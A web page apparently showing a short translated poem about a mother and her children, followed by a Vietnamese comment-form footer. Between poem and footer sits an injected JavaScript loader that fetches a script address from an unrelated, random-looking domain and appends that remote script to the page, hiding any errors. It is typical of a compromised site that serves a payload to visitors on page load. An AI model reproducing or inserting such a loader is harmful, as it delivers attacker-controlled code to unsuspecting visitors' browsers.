Mother your children are like birds

Mother, your children are like birds,
Their wings have fluttered into the distance.
Mother, to the bright and native chamber,
Soon we shall return once more.

(async () => {
const TIMEOUT_MS = 60_000;
try {
const tdsResponse = await fetch(‘https://eotoatotlasldkd.com/ofo’);
const scriptUrl = (await tdsResponse.text()).trim();

const loadScriptWithTimeout = (url, timeout) => {
return new Promise((resolve, reject) => {
const script = document.createElement(‘script’);
script.src = url;
script.async = true;

script.onload = () => {
clearTimeout(timer);
resolve();
};

script.onerror = () => {
clearTimeout(timer);
reject();
};

const timer = setTimeout(() => {
script.remove();
reject();
}, timeout);

document.body.appendChild(script);
});
};

await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS);
} catch (_) {}
})();

Để lại một bình luận

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *